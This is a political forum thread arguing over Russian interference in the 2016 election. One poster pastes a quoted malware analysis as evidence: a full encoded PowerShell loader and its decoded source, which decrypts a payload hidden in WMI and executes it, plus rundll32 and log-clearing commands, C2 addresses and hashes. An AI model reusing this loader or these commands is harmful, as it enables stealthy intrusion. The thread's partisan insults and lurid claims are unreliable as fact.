Election Interference 2018 2020
You exaggerate. On the low side - there have to be more than Trump has dollars.
mnMt1Xe8LHtBOqOkjKVZ632FeIIng1tc
Trump has never told the truth - except twice: when he said he wanted to bang his daughter Ivanka. and grabbing pussy cause his tiny hands are fast. fast!
“ .. intelligence agencies that describe Russian hackers discussing how to obtain emails from Mrs. Clinton’s server and then transmit them to Mr. Flynn via an intermediary.” Peter Smith had shown interest in getting hackers to uncover Clinton’s emails that he, for some unexplained reason, believed had already been hacked by the Russians. "
“‘‘I’m talking to Michael Flynn about this — if you find anything, can you let me know?’’ said Eric York, a computer-security expert from Atlanta who searched hacker forums on Mr. Smith’s behalf for people who might have access to the emails.”
" ... if Smith is telling the truth and that he and Flynn were working directly with hackers they suspected of working with the Russian government, then that blows up Trump’s claim that there was no collusion between his campaign and Russia."
" ... removed the provision that offered “lethal defensive weapons” to Ukraine in its war with Russia. After months of denial, the Trump team finally admitted the they had demanded that change. It was the only change in the platform the Trump’s campaign requested."
"Jared Kushner attended one of those meetings with the Russian ambassador where Flynn apparently discussed sanctions. Kushner reportedly proposed creating a back-channel to Russia outside the purview of the US government by using Russian communication capabilities, possible from inside the Russian embassy. Kushner remained silent as Flynn continually lied."
Lastly, of course, there is Trump himself who begged the Russians to hack Hillary’s email and virtually spouted Russian propaganda throughout the campaign. Trump publicly encouraged Russian hacks and gleefully disseminated information that came from them.
EnCt2b1c311144508d82738e6b2f9a5a259e1bbd160adb1c311144508d82738e6b2f9K8jDbjycNQF
dQhZhxFldR3WhqmNvpW4fpo/BRQ7BotwKb4sTC6MmGVhPSB0bFbx7CXQIGWyEGmRNKgxGjjFV9hppyS/4YGXkX3ofROfDYnfO/XAlzTJ8WVXcGfWOiyEwwA==IwEmS
GA
What are you saying?
https://www.washingtonpost.com/news/fac … f99980b493
http://www.politifact.com/truth-o-meter … mail-leak/
https://www.vox.com/policy-and-politics … ws-hannity
https://www.nytimes.com/2016/12/13/us/p … ml?mcubz=0
https://www.wired.com/2016/07/heres-kno … -dnc-hack/
https://www.nytimes.com/2016/12/20/insi … ml?mcubz=0
http://time.com/4600177/election-hack-r … ald-trump/
I can give you 1K+ more urls.
What are you saying when you ask me "How do I know"?
The only person on this forum who denies that there is no evidence is the bot wilderness. Are you saying you also believe there is 'no evidence' and only 'investigations'?
Are you saying that there is NO Fancy Bear?!?!
Yeah, I knew the links are never clicked on.
But you insist on seeing the actual code, figuring you do not how to program, I figured that would be a useless gesture also. Because I ALREADY DID THAT previously, and NOBODY commented on it. It was just like in the movie "IT", when people see something and then 'forget' it ever happened. and NEVER talk about it.
Wow, it's like a Cuban, mass brain aneurysm sonic disrupter coming straight outta of you all computers.
Repetition is HELL
https://www.dni.gov/files/documents/ICA_2017_01.pdf JAN 6 2017
You won't look at that - nope
https://www.crowdstrike.com/blog/bears- … committee/
you won't look at this neither! - Nope! nothing to see here - move along!
OK GA, W, since you are very good programmers and are experienced on computer forensics, - I have NO IDEA, why you all wasting your talents here but here the stinking code.
powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAG0AcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQANAAoACQAJACQAYwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACQAbQBzACwAIAAkAGMAcgBUAHIALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAE0AbwBkAGUAXQA6ADoAVwByAGkAdABlACkADQAKAAkACQAkAGMAcwAuAFcAcgBpAHQAZQAoACQAZABhAHQAYQAsACAAMAAsACAAJABkAGEAdABhAC4ATABlAG4AZwB0AGgAKQANAAoACQAJACQAYwBzAC4ARgBsAHUAcwBoAEYAaQBuAGEAbABCAGwAbwBjAGsAKAApAA0ACgAJAAkAJAByAGUAdAAgAD0AIAAkAG0AcwAuAFQAbwBBAHIAcgBhAHkAKAApAA0ACgAJAAkAJABjAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAAkAJABtAHMALgBDAGwAbwBzAGUAKAApAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAGUAYwByAEEAZQBzACgAJABlAG4AYwBEAGEAdABhACwAIAAkAGsAZQB5ACwAIAAkAGkAdgApAA0ACgB7AA0ACgAJACQAcgBlAHQAIAA9ACAAJABuAHUAbABsAA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHAAcgBvAHYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAANAAoACQAJACQAcAByAG8AdgAuAEsAZQB5ACAAPQAgACQAawBlAHkADQAKAAkACQAkAHAAcgBvAHYALgBJAFYAIAA9ACAAJABpAHYADQAKAAkACQAkAGQAZQBjAHIAIAA9ACAAJABwAHIAbwB2AC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkAHAAcgBvAHYALgBLAGUAeQAsACAAJABwAHIAbwB2AC4ASQBWACkADQAKAAkACQAkAHIAZQB0ACAAPQAgAHAAZQByAGYAQwByACAAJABkAGUAYwByACAAJABlAG4AYwBEAGEAdABhAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsAfQANAAoACQByAGUAdAB1AHIAbgAgACQAcgBlAHQADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAFcAUAAoACQAYwBOACwAIAAkAHAATgAsACAAJABhAEsALAAgACQAYQBJACkADQAKAHsADQAKAAkAaQBmACgAJABjAE4AIAAtAGUAcQAgACQAbgB1AGwAbAAgAC0AbwByACAAJABwAE4AIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAcgBlAHQAdQByAG4AIAAkAGYAYQBsAHMAZQB9AA0ACgAJAHQAcgB5AHsADQAKAAkACQAkAHcAcAAgAD0AIAAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJABjAE4AKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAkAHAATgBdAC4AVgBhAGwAdQBlAA0ACgAJAAkAJABlAHgARQBuACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AHAAKQANAAoACQAJACQAZQB4AEQAZQBjACAAPQAgAGQAZQBjAHIAQQBlAHMAIAAkAGUAeABFAG4AIAAkAGEASwAgACQAYQBJAA0ACgAJAAkAJABlAHgAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZQB4AEQAZQBjACkADQAKAAkACQBpAGYAKAAkAGUAeAAgAC0AZQBxACAAJABuAHUAbABsACAALQBvAHIAIAAkAGUAeAAgAC0AZQBxACAAJwAnACkADQAKAAkACQB7AHIAZQB0AHUAcgBuAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGUAeAANAAoACQAJAHIAZQB0AHUAcgBuACAAJAB0AHIAdQBlAA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAHsADQAKAAkACQByAGUAdAB1AHIAbgAgACQAZgBhAGwAcwBlAA0ACgAJAH0ADQAKAH0ADQAKAA0ACgAkAGEAZQBLACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGUANwAsACAAMAB4AGQANgAsACAAMAB4AGIAZQAsACAAMAB4AGEAOQAsACAAMAB4AGIANwAsACAAMAB4AGUANgAsACAAMAB4ADUANQAsACAAMAB4ADMAYQAsACAAMAB4AGUAZQAsACAAMAB4ADEANgAsACAAMAB4ADcAOQAsACAAMAB4AGMAYQAsACAAMAB4ADUANgAsACAAMAB4ADAAZgAsACAAMAB4AGIAYwAsACAAMAB4ADMAZgAsACAAMAB4ADIAMgAsACAAMAB4AGUAZAAsACAAMAB4AGYAZgAsACAAMAB4ADAAMgAsACAAMAB4ADQAMwAsACAAMAB4ADQAYwAsACAAMAB4ADEAYgAsACAAMAB4AGMAMAAsACAAMAB4AGUANwAsACAAMAB4ADUANwAsACAAMAB4AGIAMgAsACAAMAB4AGMAYgAsACAAMAB4AGQAOAAsACAAMAB4AGMAZQAsACAAMAB4AGQAYQAsACAAMAB4ADAAMAApAA0ACgAkAGEAZQBJACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgACgAMAB4AGIAZQAsACAAMAB4ADcAYQAsACAAMAB4ADkAMAAsACAAMAB4AGQAOQAsACAAMAB4AGQANQAsACAAMAB4AGYANwAsACAAMAB4AGEAYQAsACAAMAB4ADYAZAAsACAAMAB4AGUAOQAsACAAMAB4ADEANgAsACAAMAB4ADYANAAsACAAMAB4ADEAZAAsACAAMAB4ADkANwAsACAAMAB4ADEANgAsACAAMAB4AGMAMAAsACAAMAB4ADYANwApAA0ACgBzAFcAUAAgACcAVwBtAGkAJwAgACcAVwBtAGkAJwAgACQAYQBlAEsAIAAkAGEAZQBJACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
This decodes to:
function perfCr($crTr, $data){
$ret = $null
try{
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cs.Write($data, 0, $data.Length)
$cs.FlushFinalBlock()
$ret = $ms.ToArray()
$cs.Close()
$ms.Close()
}
catch{}
return $ret
}
function decrAes($encData, $key, $iv)
{
$ret = $null
try{
$prov = New-Object System.Security.Cryptography.RijndaelManaged
$prov.Key = $key
$prov.IV = $iv
$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
$ret = perfCr $decr $encData
}
Catch{}
return $ret
}
function sWP($cN, $pN, $aK, $aI)
{
if($cN -eq $null -or $pN -eq $null){return $false}
try{
$wp = ([wmiclass]$cN).Properties[$pN].Value
$exEn = [Convert]::FromBase64String($wp)
$exDec = decrAes $exEn $aK $aI
$ex = [Text.Encoding]::UTF8.GetString($exDec)
if($ex -eq $null -or $ex -eq ”)
{return}
Invoke-Expression $ex
return $true
}
catch{
return $false
}
}
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null
This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.
FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as:
rundll32.exe “C:\Windows\twain_64.dll”
In addition, FANCY BEAR’s X-Tunnel network tunneling tool, which facilitates connections to NAT-ed environments, was used to also execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec available from GitHub. They also engaged in a number of anti-forensic analysis measures, such as periodic event log clearing (via wevtutil cl System and wevtutil cl Security commands) and resetting timestamps of files.
.
Indicators of Compromise:
IOC Adversary IOC Type Additional Info
6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536 COZY BEAR SHA256 pagemgr.exe (SeaDaddy implant)
b101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae COZY BEAR SHA256 pagemgr.exe
(SeaDaddy implant)
185[.]100[.]84[.]134:443 COZY BEAR C2 SeaDaddy implant C2
58[.]49[.]58[.]58:443 COZY BEAR C2 SeaDaddy implant C2
218[.]1[.]98[.]203:80 COZY BEAR C2 Powershell implant C2
187[.]33[.]33[.]8:80 COZY BEAR C2 Powershell implant C2
fd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5 FANCY BEAR SHA256 twain_64.dll
(64-bit X-Agent implant)
4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976 FANCY BEAR SHA256 VmUpgradeHelper.exe (X-Tunnel implant)
40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f FANCY BEAR SHA256 VmUpgradeHelper.exe
(X-Tunnel implant)
185[.]86[.]148[.]227:443 FANCY BEAR C2 X-Agent implant C2
45[.]32[.]129[.]185:443 FANCY BEAR C2 X-Tunnel implant C2
23[.]227[.]196[.]217:443 FANCY BEAR C2 X-Tunnel implant C2
I betcha you all don't even know what trace route or ARIN lookup is neither. Here some more gamma rayz for your brain cells to explode on:
arin:185.86.148.227 arin
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '185.86.148.0 - 185.86.149.255'
% Abuse contact for '185.86.148.0 - 185.86.149.255' is 'abuse@yourserver.se'
inetnum: 185.86.148.0 - 185.86.149.255
netname: YOURSERVER-SE
descr: Virtual Server hosting
country: SE
admin-c: MB43991-RIPE
tech-c: MB43991-RIPE
status: ASSIGNED PA
mnt-by: YOURSERVER
created: 2015-09-06T16:26:02Z
last-modified: 2017-05-27T05:38:49Z
source: RIPE
person: Michael Bentov
address: Yourserver SIA
address: Ulbrokas 23, Riga, LV-1021, Latvia
phone: +371 60001383
nic-hdl: MB43991-RIPE
mnt-by: YOURSERVER
created: 2017-05-18T21:01:59Z
last-modified: 2017-05-18T21:06:24Z
source: RIPE
% Information related to '185.86.148.0/24AS52173'
route: 185.86.148.0/24
descr: YOURSERVER-SE
origin: AS52173
mnt-by: Makonix
created: 2015-09-30T21:22:59Z
last-modified: 2015-09-30T21:22:59Z
source: RIPE
% This query was served by the RIPE Database Query Service version 1.89.2 (ANGUS)
IP : 95.215.45.5
SERVER : hosted-by.yourserver.se
COUNTRY : Latvia
https://investigaterussia.org/timelines … er-attacks
Overall history of Cyber attacks since 2004
I don't people take cyber attacks seriously enough and probably you all out there still use 1234 as there credit card PIN number and '"p@$$w0rd" as the password. Even you pattern to unlock you phone is easy to guess the most popular.
https://arstechnica.com/information-tec … -patterns/
http://thediplomat.com/2015/02/is-the-u … s-to-date/
"the operation was sponsored by a nation-state with nearly unlimited resources"
2001–2015: Target: the world. Seriously, the NSA’s reach appears to be limitless
The bottom line: Using automated hacking tools, NSA cyberspies pilfer 2 petabytes of data every hour from computers worldwide.
You answered your own question: Of course Russia has been working very hard, as well as China, USA, Brazil, etc. ...
Nobody is saying the election wasn't legit, (even if it wasn't) because that would further breakdown voter's confidence in the election process, which is supposed to be a consenting contract of a representative gov't that gives gov't itself legitimacy.
'Ol Bone Spurs: 'I will totally accept' election results 'if I win'
Post-ABC poll finds 74 percent of all Americans say they accept the election of Trump as legitimate.
General Incompetence has created his own problems.
Of course Grandma Nasal Whine just puts out this week, "would not" rule out questioning the legitimacy of the 2016 election if Russian interference is deeper than currently known.
Of course you already asserted that you know with a 100% confidence that there was zero Russian hacking, which is an odd assertion since in your post you have stated, " trying hard to "guide" foreign elections the direction they want to see it go? "
Hacking is NOT guiding, it is an illegal interference with another country's election system. And saying "everybody does it" does not make it OK or legal. Cry hypocrisy all you want, it doesn't enhance your position and does it make it any more acceptable.
Related Discussions
- 6159
Did Trump Really Try To Implement a Coup?
All of the available evidence seems to say so.Here is a workable definition of a coups d'état as an "organized effort to effect sudden and irregular (e.g., illegal or extra-legal) removal of the incumbent executive authority of a national government, or to displace the authority of the highest...
- 18
Hillary Clinton’s Propaganda Remarks Raise Free Speech Concerns
Photo from Bing Free to use files.I hope my opinion piece will spark meaningful discussion and provide food for thoughtHillary Clinton has recently sparked controversy with comments regarding the potential criminal or civil punishment of Americans spreading propaganda, particularly that connected...
- 78
Is Russia interference still a hoax? What is going on?
Mike Flynn is pleading guilty to lying. Manafort & Gates have been indicted. Popadopoulas (sic) is cooperating.
- 50
Who interfered in 2016 election and how do you know?
After all of the national intelligence agencies did investigations, they sat before Congress and said Russia did it! Now we are hearing that Ukraine did it! What evidence is there to support either.Is truth no longer truth? How do you determine what is true? If we don't know...
- 77
What does Donald Trump owe Russia for winning the election?
What does Donald Trump owe Russia for winning the election?
- 17
John Durham Indicts Second Operative InTrump Russian Probe
In May 2019, Attorney General William Barr tapped Connecticut’s U.S. Attorney John Durham to look into issues related to the origins of the FBI’s Trump-Russia investigation. Durham is a longtime federal prosecutor in Connecticut known for leading organized crime and public corruption cases.Aug 2020...